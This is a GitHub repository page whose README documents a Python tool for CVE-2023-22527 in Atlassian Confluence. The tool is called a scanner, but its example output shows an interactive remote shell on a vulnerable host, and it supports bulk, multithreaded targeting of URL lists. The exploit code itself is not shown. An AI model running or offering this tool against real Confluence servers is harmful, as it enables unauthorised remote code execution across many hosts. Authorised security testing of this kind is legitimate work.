https://github.com/chocapikk/cve-2023-22527
Atlassian Confluence - Remote Code Execution
Last synced: about 1 year ago
- Host: GitHub
- URL: https://github.com/chocapikk/cve-2023-22527
- Owner: Chocapikk
- Created: 2024-01-23T10:55:28.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2024-01-23T11:30:10.000Z (over 2 years ago)
- Last Synced: 2025-04-13T17:07:29.080Z (about 1 year ago)
- Language: Python
- Size: 5.86 KB
- Stars: 10
- Watchers: 2
- Forks: 2
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# Atlassian Confluence CVE-2023-22527 Scanner 🛡️
## Overview 🌟
This tool scans for CVE-2023-22527, a critical vulnerability in Atlassian Confluence that allows unauthorized remote code execution (RCE).
## Features 🚀
- **Single URL Scan**: Scan a specific target for the vulnerability.
- **Bulk Scan**: Process multiple URLs from a file for efficient vulnerability assessment.
- **Concurrency Control**: Utilize threading for faster bulk scanning.
- **Output Logging**: Save vulnerable URLs to a specified file.
## Usage 💻
1. **Single URL Scan**: `python exploit.py -u <url>`
2. **Bulk Scan**: `python exploit.py -f <file>`
3. **Set Threads**: `python exploit.py -t <threads>`
4. **Output File**: `python exploit.py -o <output_file>`
## Requirements 📋
- Python 3.10+
- Dependencies: `requests`, `prompt_toolkit`, `rich`, `alive_progress`
## Installation 🛠️
1. Clone the repository: `git clone https://github.com/Chocapikk/CVE-2023-22527`
2. Install dependencies: `pip install -r requirements.txt`
## Example 🔍
```bash
$ python3 exploit.py -u http://localhost:8092
[+] http://localhost:8092 is vulnerable - confluence
[!] Shell is ready, please type your commands UwU
$ id
uid=2002(confluence) gid=2002(confluence) groups=2002(confluence),0(root)
$ pwd
/var/atlassian/application-data/confluence
$ hostname
ff7bfe2e7109
```
## Disclaimer ⚠️
This tool is intended for security research and should only be used on systems with explicit authorization. Misuse may lead to legal consequences.
## More Information 🔗
For more detailed information about the CVE-2023-22527 vulnerability, refer to the [Project Discovery Blog Post](https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/).